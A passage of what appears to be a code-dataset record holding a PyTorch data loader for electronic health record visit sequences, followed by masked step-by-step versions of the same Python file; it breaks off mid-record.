[[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],
[[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],
[[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]
where 310062: patient id,
0: no heart failure
[0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.
3)transform (optional): Optional transform to be applied on a sample. Data augmentation related.
4)test_ratio, valid_ratio: ratios for splitting the data if needed.
"""
self.data = loaded_list
if sort:
self.data.sort(key=lambda pt:len(pt[2]),reverse=True)
self.transform = transform
def __getitem__(self, idx, seeDescription = False):
'''
Return the patient data of index: idx of a 4-layer list
patient_id (pt_sk);
label: 0 for no, 1 for yes;
visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];
visit_codes: codes for each visit.
'''
sample = self.data[idx]
if self.transform:
sample = self.transform(sample)
vistc = np.asarray(sample[2])
desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time': vistc[:,0],'visit_codes':vistc[:,1]}
if seeDescription:
'''
if this is True:
You will get a descriptipn of what each part of data stands for
'''
print(tabulate([['patient_id', desc['patient_id']], ['label', desc['label']],
['visit_time', desc['visit_time']], ['visit_codes', desc['visit_codes']]],
headers=['data_description', 'data'], tablefmt='orgtbl'))
#print('\n Raw sample of index :', str(idx))
return sample
def __len__(self):
return len(self.data)
def preprocess(batch,pack_pad,surv): ### LR Sep 30 20 added surv_m
# Check cuda availability
if use_cuda:
flt_typ=torch.cuda.FloatTensor
lnt_typ=torch.cuda.LongTensor
else:
lnt_typ=torch.LongTensor
flt_typ=torch.FloatTensor
mb=[]
mtd=[]
lbt=[]
seq_l=[]
bsize=len(batch) ## number of patients in minibatch
lp= len(max(batch, key=lambda xmb: len(xmb[-1]))[-1]) ## maximum number of visits per patients in minibatch
llv=0
for x in batch:
lv= len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])
if llv < lv:
llv=lv # max number of codes per visit in minibatch
for pt in batch:
sk,label,ehr_seq_l = pt
lpx=len(ehr_seq_l) ## no of visits in pt record
seq_l.append(lpx)
if surv: lbt.append(Variable(flt_typ([label])))### LR Sep 30 20 added surv_m
else: lbt.append(Variable(flt_typ([[float(label)]])))
ehr_seq_tl=[]
time_dim=[]
for ehr_seq in ehr_seq_l:
pd=(0, (llv -len(ehr_seq[1])))
result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1],dtype=int)).type(lnt_typ),pd,"constant", 0)
ehr_seq_tl.append(result)
time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],dtype=int)).type(flt_typ)))
ehr_seq_t= Variable(torch.stack(ehr_seq_tl,0))
lpp= lp-lpx ## diffence between max seq in minibatch and cnt of patient visits
if pack_pad:
zp= nn.ZeroPad2d((0,0,0,lpp)) ## (0,0,0,lpp) when use the pack padded seq and (0,0,lpp,0) otherwise.
else:
zp= nn.ZeroPad2d((0,0,lpp,0))
ehr_seq_t= zp(ehr_seq_t) ## zero pad the visits med codes
mb.append(ehr_seq_t)
time_dim_v= Variable(torch.stack(time_dim,0))
time_dim_pv= zp(time_dim_v) ## zero pad the visits time diff codes
mtd.append(time_dim_pv)
lbt_t= Variable(torch.stack(lbt,0))
mb_t= Variable(torch.stack(mb,0))
if use_cuda:
mb_t.cuda()
lbt_t.cuda()
return mb_t, lbt_t,seq_l, mtd
def preprocess_multilabel(batch,pack_pad): ### LR Feb 18 21 for multi-label
# Check cuda availability
if use_cuda:
flt_typ=torch.cuda.FloatTensor
lnt_typ=torch.cuda.LongTensor
else:
lnt_typ=torch.LongTensor
flt_typ=torch.FloatTensor
mb=[]
mtd=[]
lbt=[]
seq_l=[]
bsize=len(batch) ## number of patients in minibatch
lp= len(max(batch, key=lambda xmb: len(xmb[-1]))[-1]) ## maximum number of visits per patients in minibatch
llv=0
for x in batch:
lv= len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])
if llv < lv:
llv=lv # max number of codes per visit in minibatch
for pt in batch:
sk,label,ehr_seq_l = pt
lpx=len(ehr_seq_l) ## no of visits in pt record
seq_l.append(lpx)
lbt.append(Variable(flt_typ([label])))### LR Sep 30 20 added surv_m
ehr_seq_tl=[]
time_dim=[]
for ehr_seq in ehr_seq_l:
pd=(0, (llv -len(ehr_seq[1])))
result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1],dtype=int)).type(lnt_typ),pd,"constant", 0)
ehr_seq_tl.append(result)
time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],dtype=int)).type(flt_typ)))
ehr_seq_t= Variable(torch.stack(ehr_seq_tl,0))
lpp= lp-lpx ## diffence between max seq in minibatch and cnt of patient visits
if pack_pad:
zp= nn.ZeroPad2d((0,0,0,lpp)) ## (0,0,0,lpp) when use the pack padded seq and (0,0,lpp,0) otherwise.
else:
zp= nn.ZeroPad2d((0,0,lpp,0))
ehr_seq_t= zp(ehr_seq_t) ## zero pad the visits med codes
mb.append(ehr_seq_t)
time_dim_v= Variable(torch.stack(time_dim,0))
time_dim_pv= zp(time_dim_v) ## zero pad the visits time diff codes
mtd.append(time_dim_pv)
lbt_t= Variable(torch.stack(lbt,0))
mb_t= Variable(torch.stack(mb,0))
if use_cuda:
mb_t.cuda()
lbt_t.cuda()
return mb_t, lbt_t,seq_l, mtd
#customized parts for EHRdataloader
def my_collate(batch):
if multilabel_m : mb_t, lbt_t,seq_l, mtd =preprocess_multilabel(batch,pack_pad) ### LR Sep 30 20 added surv_m
else: mb_t, lbt_t,seq_l, mtd = preprocess(batch,pack_pad,surv_m) ### LR Sep 30 20 added surv_m
return [mb_t, lbt_t,seq_l, mtd]
def iter_batch2(iterable, samplesize):
results = []
iterator = iter(iterable)
# Fill in the first samplesize elements:
for _ in range(samplesize):
results.append(iterator.__next__())
random.shuffle(results)
return results
class EHRdataloader(DataLoader):
def __init__(self, dataset, batch_size=128, shuffle=False, sampler=None, batch_sampler=None,
num_workers=0, collate_fn=my_collate, pin_memory=False, drop_last=False,
timeout=0, worker_init_fn=None, packPadMode = False , surv=False,multilbl=False): ### LR Sep 30 20 added surv
DataLoader.__init__(self, dataset, batch_size=batch_size, shuffle=False, sampler=None, batch_sampler=None,
num_workers=0, collate_fn=my_collate, pin_memory=False, drop_last=False,
timeout=0, worker_init_fn=None)
self.collate_fn = collate_fn
global pack_pad
global surv_m ### LR Sep 30 20 added surv_m
global multilabel_m
pack_pad = packPadMode
surv_m=surv ### LR Sep 30 20 added surv_m
multilabel_m=multilbl
if multilabel_m : print('multilabel data processing')
########END of main contents of EHRDataloader############
|
normal
|
{
"blob_id": "0cef70b8d661fe01ef4a1eda83a21e1186419a0d",
"index": 5038,
"step-1": "<mask token>\n\n\nclass EHRdataFromPickles(Dataset):\n\n def __init__(self, root_dir, file=None, transform=None, sort=True,\n model='RNN', test_ratio=0, valid_ratio=0):\n \"\"\"\n Args:\n 1) root_dir (string): Path to pickled file(s).\n The directory contains the directory to file(s): specify 'file' \n please create separate instances from this object if your data is split into train, validation and test files. \n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.\n \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.file = None\n if file != None:\n self.file = file\n self.data = pickle.load(open(root_dir + file, 'rb'), encoding=\n 'bytes')\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.test_ratio = test_ratio\n self.valid_ratio = valid_ratio\n else:\n print('No file specified')\n self.root_dir = root_dir\n self.transform = transform\n\n def __splitdata__(self, sort=True):\n random.seed(3)\n random.shuffle(self.data)\n dataSize = len(self.data)\n nTest = int(self.test_ratio * dataSize)\n nValid = int(self.valid_ratio * dataSize)\n test = self.data[:nTest]\n valid = self.data[nTest:nTest + nValid]\n train = self.data[nTest + nValid:]\n if sort:\n test.sort(key=lambda pt: len(pt[2]), reverse=True)\n valid.sort(key=lambda pt: len(pt[2]), reverse=True)\n train.sort(key=lambda pt: len(pt[2]), reverse=True)\n return train, test, valid\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n if self.file != None:\n sample = self.data[idx]\n else:\n print('No file specified')\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n \"\"\" \n just the length of data\n \"\"\"\n if self.file != None:\n return len(self.data)\n else:\n print('No file specified')\n\n\nclass EHRdataFromLoadedPickles(Dataset):\n\n def __init__(self, loaded_list, transform=None, sort=True, model='RNN'):\n \"\"\"\n Args:\n 1) loaded_list from pickled file\n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes. \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.data = loaded_list\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.transform = transform\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n sample = self.data[idx]\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n return len(self.data)\n\n\ndef preprocess(batch, pack_pad, surv):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n if surv:\n lbt.append(Variable(flt_typ([label])))\n else:\n lbt.append(Variable(flt_typ([[float(label)]])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef preprocess_multilabel(batch, pack_pad):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n lbt.append(Variable(flt_typ([label])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef my_collate(batch):\n if multilabel_m:\n mb_t, lbt_t, seq_l, mtd = preprocess_multilabel(batch, pack_pad)\n else:\n mb_t, lbt_t, seq_l, mtd = preprocess(batch, pack_pad, surv_m)\n return [mb_t, lbt_t, seq_l, mtd]\n\n\ndef iter_batch2(iterable, samplesize):\n results = []\n iterator = iter(iterable)\n for _ in range(samplesize):\n results.append(iterator.__next__())\n random.shuffle(results)\n return results\n\n\nclass EHRdataloader(DataLoader):\n\n def __init__(self, dataset, batch_size=128, shuffle=False, sampler=None,\n batch_sampler=None, num_workers=0, collate_fn=my_collate,\n pin_memory=False, drop_last=False, timeout=0, worker_init_fn=None,\n packPadMode=False, surv=False, multilbl=False):\n DataLoader.__init__(self, dataset, batch_size=batch_size, shuffle=\n False, sampler=None, batch_sampler=None, num_workers=0,\n collate_fn=my_collate, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None)\n self.collate_fn = collate_fn\n global pack_pad\n global surv_m\n global multilabel_m\n pack_pad = packPadMode\n surv_m = surv\n multilabel_m = multilbl\n if multilabel_m:\n print('multilabel data processing')\n",
"step-2": "<mask token>\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n<mask token>\nwarnings.filterwarnings('ignore')\nplt.ion()\n<mask token>\n\n\nclass EHRdataFromPickles(Dataset):\n\n def __init__(self, root_dir, file=None, transform=None, sort=True,\n model='RNN', test_ratio=0, valid_ratio=0):\n \"\"\"\n Args:\n 1) root_dir (string): Path to pickled file(s).\n The directory contains the directory to file(s): specify 'file' \n please create separate instances from this object if your data is split into train, validation and test files. \n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.\n \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.file = None\n if file != None:\n self.file = file\n self.data = pickle.load(open(root_dir + file, 'rb'), encoding=\n 'bytes')\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.test_ratio = test_ratio\n self.valid_ratio = valid_ratio\n else:\n print('No file specified')\n self.root_dir = root_dir\n self.transform = transform\n\n def __splitdata__(self, sort=True):\n random.seed(3)\n random.shuffle(self.data)\n dataSize = len(self.data)\n nTest = int(self.test_ratio * dataSize)\n nValid = int(self.valid_ratio * dataSize)\n test = self.data[:nTest]\n valid = self.data[nTest:nTest + nValid]\n train = self.data[nTest + nValid:]\n if sort:\n test.sort(key=lambda pt: len(pt[2]), reverse=True)\n valid.sort(key=lambda pt: len(pt[2]), reverse=True)\n train.sort(key=lambda pt: len(pt[2]), reverse=True)\n return train, test, valid\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n if self.file != None:\n sample = self.data[idx]\n else:\n print('No file specified')\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n \"\"\" \n just the length of data\n \"\"\"\n if self.file != None:\n return len(self.data)\n else:\n print('No file specified')\n\n\nclass EHRdataFromLoadedPickles(Dataset):\n\n def __init__(self, loaded_list, transform=None, sort=True, model='RNN'):\n \"\"\"\n Args:\n 1) loaded_list from pickled file\n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes. \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.data = loaded_list\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.transform = transform\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n sample = self.data[idx]\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n return len(self.data)\n\n\ndef preprocess(batch, pack_pad, surv):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n if surv:\n lbt.append(Variable(flt_typ([label])))\n else:\n lbt.append(Variable(flt_typ([[float(label)]])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef preprocess_multilabel(batch, pack_pad):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n lbt.append(Variable(flt_typ([label])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef my_collate(batch):\n if multilabel_m:\n mb_t, lbt_t, seq_l, mtd = preprocess_multilabel(batch, pack_pad)\n else:\n mb_t, lbt_t, seq_l, mtd = preprocess(batch, pack_pad, surv_m)\n return [mb_t, lbt_t, seq_l, mtd]\n\n\ndef iter_batch2(iterable, samplesize):\n results = []\n iterator = iter(iterable)\n for _ in range(samplesize):\n results.append(iterator.__next__())\n random.shuffle(results)\n return results\n\n\nclass EHRdataloader(DataLoader):\n\n def __init__(self, dataset, batch_size=128, shuffle=False, sampler=None,\n batch_sampler=None, num_workers=0, collate_fn=my_collate,\n pin_memory=False, drop_last=False, timeout=0, worker_init_fn=None,\n packPadMode=False, surv=False, multilbl=False):\n DataLoader.__init__(self, dataset, batch_size=batch_size, shuffle=\n False, sampler=None, batch_sampler=None, num_workers=0,\n collate_fn=my_collate, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None)\n self.collate_fn = collate_fn\n global pack_pad\n global surv_m\n global multilabel_m\n pack_pad = packPadMode\n surv_m = surv\n multilabel_m = multilbl\n if multilabel_m:\n print('multilabel data processing')\n",
"step-3": "<mask token>\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n<mask token>\nwarnings.filterwarnings('ignore')\nplt.ion()\n<mask token>\nuse_cuda = torch.cuda.is_available()\n\n\nclass EHRdataFromPickles(Dataset):\n\n def __init__(self, root_dir, file=None, transform=None, sort=True,\n model='RNN', test_ratio=0, valid_ratio=0):\n \"\"\"\n Args:\n 1) root_dir (string): Path to pickled file(s).\n The directory contains the directory to file(s): specify 'file' \n please create separate instances from this object if your data is split into train, validation and test files. \n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.\n \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.file = None\n if file != None:\n self.file = file\n self.data = pickle.load(open(root_dir + file, 'rb'), encoding=\n 'bytes')\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.test_ratio = test_ratio\n self.valid_ratio = valid_ratio\n else:\n print('No file specified')\n self.root_dir = root_dir\n self.transform = transform\n\n def __splitdata__(self, sort=True):\n random.seed(3)\n random.shuffle(self.data)\n dataSize = len(self.data)\n nTest = int(self.test_ratio * dataSize)\n nValid = int(self.valid_ratio * dataSize)\n test = self.data[:nTest]\n valid = self.data[nTest:nTest + nValid]\n train = self.data[nTest + nValid:]\n if sort:\n test.sort(key=lambda pt: len(pt[2]), reverse=True)\n valid.sort(key=lambda pt: len(pt[2]), reverse=True)\n train.sort(key=lambda pt: len(pt[2]), reverse=True)\n return train, test, valid\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n if self.file != None:\n sample = self.data[idx]\n else:\n print('No file specified')\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n \"\"\" \n just the length of data\n \"\"\"\n if self.file != None:\n return len(self.data)\n else:\n print('No file specified')\n\n\nclass EHRdataFromLoadedPickles(Dataset):\n\n def __init__(self, loaded_list, transform=None, sort=True, model='RNN'):\n \"\"\"\n Args:\n 1) loaded_list from pickled file\n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 